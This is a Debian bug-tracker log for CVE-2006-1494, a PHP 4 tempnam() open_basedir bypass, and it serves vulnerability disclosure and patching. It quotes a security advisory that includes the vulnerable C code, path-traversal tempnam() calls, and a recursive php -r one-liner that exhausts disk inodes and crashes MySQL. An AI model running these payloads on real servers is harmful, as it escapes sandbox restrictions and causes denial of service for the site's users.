Debian Bug report logs -
#361855
[CVE-2006-1494] tempnam() open_basedir bypass
Reported by: Oliver Paulus <oliver@code-project.org>
Date: Mon, 10 Apr 2006 19:33:11 UTC
Severity: important
Tags: patch, security
Found in version php4/4:4.3.10-16
Done: sean finney <seanius@seanius.net>
Bug is archived. No further changes may be made.
Toggle useless messages
Report forwarded to debian-bugs-dist@lists.debian.org, Debian PHP Maintainers <pkg-php-maint@lists.alioth.debian.org>:
Bug#361855; Package php4.
(full text, mbox, link).
Acknowledgement sent to Oliver Paulus <oliver@code-project.org>:
New Bug report received and forwarded. Copy sent to Debian PHP Maintainers <pkg-php-maint@lists.alioth.debian.org>.
(full text, mbox, link).
Message #5 received at submit@bugs.debian.org (full text, mbox, reply):
[Message part 1 (text/plain, inline)]
Package: php4
Version: 4:4.3.10-16
Severity: grave
for more informaton see:
http://securityreason.com/achievement_securityalert/36
--
Oliver Paulus
OpenPGP
Key id: 28D9C44F
Fingerprint: EADA 62FC 07DC 3361 A3D6 4174 2DE3 C027 28D9 C44F
Public Key: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x28D9C44F
[Message part 2 (application/pgp-signature, inline)]
Tags added: security
Request was from Filipus Klutiero <ido@vif.com>
to control@bugs.debian.org.
(full text, mbox, link).
Information forwarded to debian-bugs-dist@lists.debian.org, Debian PHP Maintainers <pkg-php-maint@lists.alioth.debian.org>:
Bug#361855; Package php4.
(full text, mbox, link).
Acknowledgement sent to Ondrej Sury <ondrej@sury.org>:
Extra info received and forwarded to list. Copy sent to Debian PHP Maintainers <pkg-php-maint@lists.alioth.debian.org>.
(full text, mbox, link).
Message #12 received at 361855@bugs.debian.org (full text, mbox, reply):
[Message part 1 (text/plain, inline)]
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
[tempnam() open_basedir bypass PHP 4.4.2 and 5.1.2]
Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- -Written: 26.3.2006
- -Public: 8.4.2006
from SECURITYREASON.COM
CVE-2006-1494
- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is
borrowed from C, Java and
Perl with a couple of unique PHP-specific features thrown in. The goal
of the language is to
allow web developers to write dynamically generated pages quickly.
A nice introduction to PHP by Stig Sæther Bakken can be found at
http://www.zend.com/zend/art/intro.php on the Zend website. Also, much
of the PHP Conference
Material is freely available.
tempnam -- Create file with unique file name
- --- 1. tempnam() open_basedir bypass ---
In function tempname() are required 2 arg`s.
http://pl.php.net/manual/en/function.tempnam.php
string tempnam ( string dir, string prefix )
So, if we have open_basedir set to /home, we can't create file
over /home directory.
In ext/standard/file.c (PHP 4.4.2)
- -550-578---
PHP_FUNCTION(tempnam)
{
pval **arg1, **arg2;
char *d;
char *opened_path;
char p[64];
FILE *fp;
if (ZEND_NUM_ARGS() != 2 || zend_get_parameters_ex(2, &arg1, &arg2) ==
FAILURE) {
WRONG_PARAM_COUNT;
}
convert_to_string_ex(arg1);
convert_to_string_ex(arg2);
if (php_check_open_basedir(Z_STRVAL_PP(arg1) TSRMLS_CC)) {
RETURN_FALSE;
}
d = estrndup(Z_STRVAL_PP(arg1), Z_STRLEN_PP(arg1));
strlcpy(p, Z_STRVAL_PP(arg2), sizeof(p));
if ((fp = php_open_temporary_file(d, p, &opened_path TSRMLS_CC))) {
fclose(fp);
RETVAL_STRING(opened_path, 0);
} else {
RETVAL_FALSE;
}
efree(d);
}
- -550-578---
if (php_check_open_basedir(Z_STRVAL_PP(arg1) TSRMLS_CC)) {
RETURN_FALSE;
}
Where is arg2?
So we can write exploit like:
tempnam("path_from_open_basedir",
"../../../../../../../../Open_basedir_bypasswd");
tempnam("/home", "../../../../../../tmp/cx");
etc.
It is low issue but you can try create a lot of files and overload
inodes from HD.I have one
particion.
/var /dev/ad0s1e 1.0G 97M 858M 10% /var <- Space (B)
/dev/ad0s1e 1012974 94472 837466 10% 3796 137514 3% /var <- INODES
where mysql and apache try create some file. WWhen we overload free
inodes, system have big
problem with apache, mysql.
Example:
cxib# php -r 'function cx(){ tempnam("/www/",
"../../../../../../var/tmp/cx"); cx(); } cx();'
/var: create/symlink failed, no inodes free
/var: create/symlink failed, no inodes free
/var: create/symlink failed, no inodes free
/var: create/symlink failed, no inodes free
... etc
/usr/local/libexec/mysqld: Can't create/write to file
'/var/tmp/ibBIsZ6o' (Errcode: 13)
And mysql die()!
- --- 2. How to fix ---
CVS
http://cvs.php.net/viewcvs.cgi/php-src/NEWS
- --- 3. Greets ---
For: sp3x
and
p_e_a, pi3, eax, Infospec ;]
- --- 4. Contact ---
Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
SecurityReason.Com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (FreeBSD)
iD8DBQFEOAZB3Ke13X/fTO4RAiDmAKCbBZP8JBC0F/9cB5OgUFJPgqHB4QCgon9L
kBEMIExP2TZ0+NP7l5uk9TE=
=f3i4
-----END PGP SIGNATURE-----
--
Ondrej Sury <ondrej@sury.org>
[signature.asc (application/pgp-signature, inline)]
Tags added: security
Request was from Ondrej Sury <ondrej@sury.org>
to control@bugs.debian.org.
(full text, mbox, link).
Severity set to `important'.
Request was from Steve Langasek <vorlon@debian.org>
to control@bugs.debian.org.
(full text, mbox, link).
Reply sent to Steve Langasek <vorlon@debian.org>:
You have taken responsibility.
(full text, mbox, link).
Notification sent to Oliver Paulus <oliver@code-project.org>:
Bug acknowledged by developer.
(full text, mbox, link).
Message #23 received at 361855-done@bugs.debian.org (full text, mbox, reply):
[Message part 1 (text/plain, inline)]
Version: 4:4.4.2-1
severity 361854 important
severity 361855 important
severity 361856 important
thanks
On Mon, Apr 10, 2006 at 11:14:43PM +0200, Oliver Paulus wrote:
> for more informaton see:
> http://securityreason.com/achievement_securityalert/34
On Mon, Apr 10, 2006 at 11:14:43PM +0200, Oliver Paulus wrote:
> for more informaton see:
> http://securityreason.com/achievement_securityalert/35
On Mon, Apr 10, 2006 at 11:16:11PM +0200, Oliver Paulus wrote:
> for more informaton see:
> http://securityreason.com/achievement_securityalert/36
On Mon, Apr 10, 2006 at 11:17:52PM +0200, Oliver Paulus wrote:
> for more informaton see:
> http://securityreason.com/achievement_securityalert/37
It is my understanding that all of these bugs are fixed in the etch version
of php4; I'm accordingly marking them as closed.
In addition, except for the cross-site scripting bug, none of these appear
to warrant severity: grave.
--
Steve Langasek Give me a lever long enough and a Free OS
Debian Developer to set it on, and I can move the world.
vorlon@debian.org http://www.debian.org/
[signature.asc (application/pgp-signature, inline)]
Bug marked as found in version 4:4.4.2-1.
Request was from Filipus Klutiero <ido@vif.com>
to control@bugs.debian.org.
(full text, mbox, link).
Bug marked as not found in version 4:4.4.2-1.
Request was from Steve Langasek <vorlon@debian.org>
to control@bugs.debian.org.
(full text, mbox, link).
Bug marked as fixed in version 4:4.4.2-1, send any further explanations to Oliver Paulus <oliver@code-project.org>
Request was from Steve Langasek <vorlon@debian.org>
to control@bugs.debian.org.
(full text, mbox, link).
Changed Bug title.
Request was from Filipus Klutiero <ido@vif.com>
to control@bugs.debian.org.
(full text, mbox, link).
Bug reopened, originator not changed.
Request was from Steve Langasek <vorlon@debian.org>
to control@bugs.debian.org.
(full text, mbox, link).
Information forwarded to debian-bugs-dist@lists.debian.org, Debian PHP Maintainers <pkg-php-maint@lists.alioth.debian.org>:
Bug#361855; Package php4.
(full text, mbox, link).
Acknowledgement sent to Allard Hoeve <allard@byte.nl>:
Extra info received and forwarded to list. Copy sent to Debian PHP Maintainers <pkg-php-maint@lists.alioth.debian.org>.
(full text, mbox, link).
Message #38 received at 361855@bugs.debian.org (full text, mbox, reply):
[Message part 1 (text/plain, inline)]
tags patch
thanks
The patch from CVS (adapted to fit 4:4.3.10-16) is attached.
CVS commit:
http://cvs.php.net/viewcvs.cgi/php-src/ext/standard/file.c?r1=1.279.2.70.2.4&r2=1.279.2.70.2.6&pathrev=PHP_4_4
Regards,
Allard
[tempnam.patch (text/plain, attachment)]
Tags added: patch
Request was from Allard Hoeve <allard@byte.nl>
to control@bugs.debian.org.
(full text, mbox, link).
Bug closed, send any further explanations to Oliver Paulus <oliver@code-project.org>
Request was from sean finney <seanius@seanius.net>
to control@bugs.debian.org.
(full text, mbox, link).
Bug archived.
Request was from Debbugs Internal Request <owner@bugs.debian.org>
to internal_control@bugs.debian.org.
(Mon, 18 Jun 2007 09:32:11 GMT) (full text, mbox, link).
Send a report that this bug log contains spam.
Debian bug tracking system administrator <owner@bugs.debian.org>.
Last modified:
Wed Jun 19 13:55:27 2019;
Machine Name:
buxtehude
Debian Bug tracking system
Debbugs is free software and licensed under the terms of the GNU
Public License version 2. The current version can be obtained
from https://bugs.debian.org/debbugs-source/.
Copyright © 1999 Darren O. Benham,
1997,2003 nCipher Corporation Ltd,
1994-97 Ian Jackson,
2005-2017 Don Armstrong, and many other contributors.
Vulmon